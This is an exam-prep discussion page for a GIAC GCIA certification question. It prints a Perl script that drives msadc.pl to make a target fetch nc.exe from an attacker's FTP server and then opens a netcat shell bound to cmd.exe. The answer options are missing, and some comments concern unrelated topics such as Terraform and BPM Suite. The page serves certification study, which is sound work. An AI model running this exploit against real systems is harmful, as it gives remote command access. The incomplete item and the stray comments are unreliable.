New Year Sale 2026! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions

GIAC GCIA Exam - Topic 6 Question 30 Discussion

Actual exam question for GIAC's GCIA exam
Question #: 30
Topic #: 6
[All GCIA Questions]

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h

$host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system

("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");

system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get

hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is

downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is

finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Show Suggested Answer Hide Answer
Suggested Answer: D

Contribute your Thoughts:

0/2000 characters
Tamra
3 months ago
Not sure about that, seems too straightforward for a hacker.
upvoted 0 times
...
Barbra
3 months ago
I think it creates a share called 'sasfile'.
upvoted 0 times
...
Sherell
4 months ago
Wait, is it really using cmd.exe? That's risky!
upvoted 0 times
...
Xochitl
4 months ago
Totally agree, looks like it's setting up a backdoor.
upvoted 0 times
...
Yolande
4 months ago
This script is definitely trying to exploit FTP.
upvoted 0 times
...
Britt
4 months ago
I think the answer might be D because it mentions opening a listener, but I’m not completely confident about the details of how the exploit works.
upvoted 0 times
...
Kati
4 months ago
I feel like the script is trying to open a command shell on a specific port, but I'm confused about whether that means it would be a telnet listener or something else.
upvoted 0 times
...
Bernardo
5 months ago
This kind of question reminds me of a practice one we did about FTP vulnerabilities. I think it might be related to creating an FTP server, but I can't recall the specifics.
upvoted 0 times
...
Lindsey
5 months ago
I remember we discussed how Perl scripts can be used for exploits, but I'm not entirely sure what the output would be here.
upvoted 0 times
...
Kate
5 months ago
Okay, I think I've got this. Adding inactive relationships between the sales table and the date table sounds like a good approach to support the analysis of sales over time based on all the date foreign keys. I'll double-check my work, but I'm feeling confident about this one.
upvoted 0 times
...
Clay
5 months ago
I'm pretty lost on this one. I don't have much experience with BPM Suite or BAM, so I'm not sure what the right answer is. I'll have to guess and hope for the best.
upvoted 0 times
...
Cyndy
5 months ago
I have a feeling that Terraform is primarily for provisioning environments, but does it handle orchestration as well? I'll have to think about that one.
upvoted 0 times
...

Save Cancel